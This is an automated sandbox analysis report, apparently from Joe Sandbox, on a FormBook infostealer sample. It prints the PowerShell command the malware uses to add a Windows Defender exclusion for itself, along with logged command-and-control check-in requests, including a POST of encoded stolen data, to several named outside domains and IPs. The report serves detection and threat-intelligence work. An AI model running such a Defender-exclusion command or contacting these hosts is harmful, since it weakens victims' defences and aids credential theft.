Edit tour

Windows Analysis Report
4p5XLVXJnq.exe

Overview

General Information

Sample name:	4p5XLVXJnq.exe renamed because original name is a hash value
Original sample name:	9bf03ba46e371b24b335b830235845ceb42b215d414eca1aeb91c4d4303da999.exe
Analysis ID:	1588793
MD5:	a2e835771815bdcf402a788b18068adb
SHA1:	47c2089eb930880d799e8725d05ab0150194c272
SHA256:	9bf03ba46e371b24b335b830235845ceb42b215d414eca1aeb91c4d4303da999
Tags:	exeFormbookuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected FormBook

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

4p5XLVXJnq.exe (PID: 3572 cmdline: "C:\Users\user\Desktop\4p5XLVXJnq.exe" MD5: A2E835771815BDCF402A788B18068ADB)

powershell.exe (PID: 1200 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4p5XLVXJnq.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7120 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

4p5XLVXJnq.exe (PID: 6484 cmdline: "C:\Users\user\Desktop\4p5XLVXJnq.exe" MD5: A2E835771815BDCF402A788B18068ADB)

yAMzZKaZoBLE.exe (PID: 1680 cmdline: "C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

DpiScaling.exe (PID: 6428 cmdline: "C:\Windows\SysWOW64\DpiScaling.exe" MD5: D44D3A0F5E53F6ECC5C6232930CFCC5E)

yAMzZKaZoBLE.exe (PID: 5068 cmdline: "C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 1120 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000009.00000002.3911403503.0000000004400000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.2497694458.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.3913101249.0000000004B90000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.3909863073.0000000000610000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.2498497555.0000000001170000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.3911348122.00000000043B0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.3911212412.0000000006760000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.2504665836.0000000005390000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Process Memory Space: 4p5XLVXJnq.exe PID: 3572	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.4p5XLVXJnq.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
4.2.4p5XLVXJnq.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4p5XLVXJnq.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4p5XLVXJnq.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4p5XLVXJnq.exe", ParentImage: C:\Users\user\Desktop\4p5XLVXJnq.exe, ParentProcessId: 3572, ParentProcessName: 4p5XLVXJnq.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4p5XLVXJnq.exe", ProcessId: 1200, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4p5XLVXJnq.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4p5XLVXJnq.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4p5XLVXJnq.exe", ParentImage: C:\Users\user\Desktop\4p5XLVXJnq.exe, ParentProcessId: 3572, ParentProcessName: 4p5XLVXJnq.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4p5XLVXJnq.exe", ProcessId: 1200, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T05:43:07.599898+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49980	176.57.65.76	80	TCP
2025-01-11T05:43:10.145454+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49981	176.57.65.76	80	TCP
2025-01-11T05:43:12.788716+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49982	176.57.65.76	80	TCP
2025-01-11T05:43:20.831673+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49985	199.59.243.228	80	TCP
2025-01-11T05:43:23.394009+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49986	199.59.243.228	80	TCP
2025-01-11T05:43:25.931120+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49987	199.59.243.228	80	TCP
2025-01-11T05:43:42.146640+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49989	209.74.79.40	80	TCP
2025-01-11T05:43:44.699994+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49990	209.74.79.40	80	TCP
2025-01-11T05:43:47.262807+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49991	209.74.79.40	80	TCP
2025-01-11T05:43:55.555084+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49993	136.243.225.5	80	TCP
2025-01-11T05:43:58.109064+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49994	136.243.225.5	80	TCP
2025-01-11T05:44:00.651628+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49995	136.243.225.5	80	TCP
2025-01-11T05:44:09.091283+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49997	185.68.108.243	80	TCP
2025-01-11T05:44:11.638921+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49998	185.68.108.243	80	TCP
2025-01-11T05:44:14.183488+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49999	185.68.108.243	80	TCP
2025-01-11T05:44:23.057330+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50001	134.122.135.48	80	TCP
2025-01-11T05:44:25.640046+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50002	134.122.135.48	80	TCP
2025-01-11T05:44:28.175216+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50003	134.122.135.48	80	TCP
2025-01-11T05:44:36.427849+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50005	217.160.0.167	80	TCP
2025-01-11T05:44:38.985596+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50006	217.160.0.167	80	TCP
2025-01-11T05:44:41.529827+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50007	217.160.0.167	80	TCP
2025-01-11T05:44:58.556678+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50009	104.21.64.1	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.accusolution.pro/8s4j/?Kd=jthLTDCvcQMkIiWuaX/K6uB1o7SeowFnyQimw/GD7x6/Y+l6zuu1jPcu9YPIxFu2hqeuZobX+ylz2ANUYAJ87sGQ/ef593tMNZAg23aCwNcsxbY/VsSG/4rC7o9NDd+huw==&Gr=hRRPf2Bx	Avira URL Cloud: Label: malware
Source: http://www.accusolution.pro/8s4j/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: 4p5XLVXJnq.exe	ReversingLabs: Detection: 68%
Source: 4p5XLVXJnq.exe	Virustotal: Detection: 72%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 4.2.4p5XLVXJnq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.4p5XLVXJnq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.3911403503.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2497694458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3913101249.0000000004B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3909863073.0000000000610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2498497555.0000000001170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3911348122.00000000043B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3911212412.0000000006760000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2504665836.0000000005390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 4p5XLVXJnq.exe

Joe Sandbox ML: detected

Source: 4p5XLVXJnq.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 4p5XLVXJnq.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: yAMzZKaZoBLE.exe, 00000008.00000000.2419490185.00000000009DE000.00000002.00000001.01000000.0000000C.sdmp, yAMzZKaZoBLE.exe, 0000000B.00000000.2596621789.00000000009DE000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: wntdll.pdbUGP source: 4p5XLVXJnq.exe, 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, DpiScaling.exe, 00000009.00000003.2525195033.000000000462B000.00000004.00000020.00020000.00000000.sdmp, DpiScaling.exe, 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmp, DpiScaling.exe, 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, DpiScaling.exe, 00000009.00000003.2522433051.000000000447E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 4p5XLVXJnq.exe, 4p5XLVXJnq.exe, 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, DpiScaling.exe, DpiScaling.exe, 00000009.00000003.2525195033.000000000462B000.00000004.00000020.00020000.00000000.sdmp, DpiScaling.exe, 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmp, DpiScaling.exe, 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, DpiScaling.exe, 00000009.00000003.2522433051.000000000447E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: DpiScaling.pdb source: 4p5XLVXJnq.exe, 00000004.00000002.2498176103.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, yAMzZKaZoBLE.exe, 00000008.00000002.3910584978.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: DpiScaling.pdbGCTL source: 4p5XLVXJnq.exe, 00000004.00000002.2498176103.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, yAMzZKaZoBLE.exe, 00000008.00000002.3910584978.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: 9_2_0062CE10 FindFirstFileW,FindNextFileW,FindClose,

9_2_0062CE10

Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 4x nop then xor eax, eax		9_2_00619F00
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 4x nop then mov ebx, 00000004h		9_2_045204E8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49981 -> 176.57.65.76:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49986 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 134.122.135.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49998 -> 185.68.108.243:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50002 -> 134.122.135.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49997 -> 185.68.108.243:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49990 -> 209.74.79.40:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49987 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49985 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50003 -> 134.122.135.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49982 -> 176.57.65.76:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49989 -> 209.74.79.40:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49980 -> 176.57.65.76:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49995 -> 136.243.225.5:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49999 -> 185.68.108.243:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49991 -> 209.74.79.40:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49993 -> 136.243.225.5:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49994 -> 136.243.225.5:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 217.160.0.167:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50006 -> 217.160.0.167:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 217.160.0.167:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.futurexz.xyz

Source: Joe Sandbox View

IP Address: 194.245.148.189 194.245.148.189

Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View	ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /a8nx/?Gr=hRRPf2Bx&Kd=+ijtfUcEkczZonQRTZPeCxhL9X8p6elqT8rXZI1bhPKlL7JJ7DdsZ8/v+QWmOaPAOWgXu8Ydnt1hKQQAhZJ0WwNa4BdoDk4Jtf0qdRrQh94duU9UXEEBP8Ipt55IFbhY/Q== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.did-ready.infoUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /67jc/?Kd=kDkUHRN5t7dj/L6paso6inXd6eXYDn0Z28RJcX0ruebcxps2UknIHDMRpo6SPn5cYwuXhe648Q1lIcrqVg3rZWhdfVOSSLsn1Z1cw9XoFAJblBc0qH/JGhW5RY1Iq+2JBw==&Gr=hRRPf2Bx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.newbh.proUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /k45z/?Kd=Hhv1IBz65eD70HjhCg9ywsDykByP0cXiBlXjDO6l9OvALlXnnYphilqBzmviCqMlGACPw9TT4DmHF7/s/4BbtdMdJsOc8JxZhXcYSMMJNOepRHOr4zrtMEdCk8SbKI6tkg==&Gr=hRRPf2Bx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.deadshoy.techUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /bhaz/?Kd=d3C+EkBuN5s1g6Sv3GF5Q4rw9r47fZ2/rALJg63gfJf8n+sIpfLA3JNW/O2di/HTM2qVhQtzuGVJ+YLVpF6sqJtunC4ShtoFe9xqgD8f0kMZq1MCRe7r1Di4X0JZPZm+NQ==&Gr=hRRPf2Bx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.futurexz.xyzUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /wzdf/?Kd=jBNibQcdmOFg/RIqG8jlAjBoyJ6r3PRdeIkgLqEqUdIwomL9MZX3SvRzFch/9Z3uNAs5avQYsDK6NbrpTb32yXtCW6Qn2OjKpMQhR5ymoCju+M+4ZuS09qSIsL0S7/Eveg==&Gr=hRRPf2Bx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.myfastuploader.sbsUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /8s4j/?Kd=jthLTDCvcQMkIiWuaX/K6uB1o7SeowFnyQimw/GD7x6/Y+l6zuu1jPcu9YPIxFu2hqeuZobX+ylz2ANUYAJ87sGQ/ef593tMNZAg23aCwNcsxbY/VsSG/4rC7o9NDd+huw==&Gr=hRRPf2Bx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.accusolution.proUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /vnow/?Kd=UBWUKOEAPjIWQHwFUqnmPtvrSslksdKNLvkuVvZ7KceDxf9/w1X4XetT7BOQN8HlQ1RQJiTovrcX/QNxOGaJuCojc3yZmj9g+0kp06Y6wkEoK+9lqojOZE6QDMSCPSaQNA==&Gr=hRRPf2Bx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.jrcov55qgcxp5fwa.topUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /orhf/?Gr=hRRPf2Bx&Kd=stnCcogzN1x+tq8kUR2EOq3j5SEJj27zufK/G0Bkr3foJj/GHhHN2F3DRNNOABXS75shJsHt1p5hW1Jmsa7+eU3aIqXMhH9SH9XwjZlg2EvO5dx+aK8E5fiy4tUvoUJvjQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.nocoma.berlinUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.did-ready.info
Source: global traffic	DNS traffic detected: DNS query: www.newbh.pro
Source: global traffic	DNS traffic detected: DNS query: www.deadshoy.tech
Source: global traffic	DNS traffic detected: DNS query: www.spindisclite.store
Source: global traffic	DNS traffic detected: DNS query: www.futurexz.xyz
Source: global traffic	DNS traffic detected: DNS query: www.myfastuploader.sbs
Source: global traffic	DNS traffic detected: DNS query: www.accusolution.pro
Source: global traffic	DNS traffic detected: DNS query: www.jrcov55qgcxp5fwa.top
Source: global traffic	DNS traffic detected: DNS query: www.nocoma.berlin
Source: global traffic	DNS traffic detected: DNS query: www.1337street.shop
Source: global traffic	DNS traffic detected: DNS query: www.buyspeechst.shop

Source: unknown

HTTP traffic detected: POST /67jc/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-usConnection: closeCache-Control: no-cacheContent-Length: 203Content-Type: application/x-www-form-urlencodedHost: www.newbh.proOrigin: http://www.newbh.proReferer: http://www.newbh.pro/67jc/User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36Data Raw: 4b 64 3d 70 42 4d 30 45 6c 4e 75 7a 70 35 44 6f 61 62 77 4d 65 35 59 6e 47 32 6d 76 70 50 63 56 58 4d 79 37 63 74 67 62 6b 63 75 6b 4e 4f 79 6e 62 6c 6b 4b 54 66 72 48 56 41 58 6b 59 79 62 4c 48 56 48 53 52 53 67 6c 4b 65 43 6a 43 30 47 4b 74 33 78 55 52 66 76 62 32 31 4a 41 6c 37 77 52 72 30 71 6f 37 67 53 77 4d 71 5a 47 68 74 71 78 68 67 2f 70 32 4b 4c 58 54 33 68 59 49 74 47 71 74 72 7a 61 71 79 70 48 6f 54 75 6b 30 79 65 73 61 43 68 56 45 63 4f 32 67 6f 6c 58 31 47 53 65 75 65 70 4d 67 2f 6d 31 4f 6d 6c 65 39 72 4f 46 77 74 53 59 59 54 51 78 5a 62 5a 53 61 69 4b 31 32 4b 46 6f 4e 42 52 49 54 67 3d Data Ascii: Kd=pBM0ElNuzp5DoabwMe5YnG2mvpPcVXMy7ctgbkcukNOynblkKTfrHVAXkYybLHVHSRSglKeCjC0GKt3xURfvb21JAl7wRr0qo7gSwMqZGhtqxhg/p2KLXT3hYItGqtrzaqypHoTuk0yesaChVEcO2golX1GSeuepMg/m1Omle9rOFwtSYYTQxZbZSaiK12KFoNBRITg=

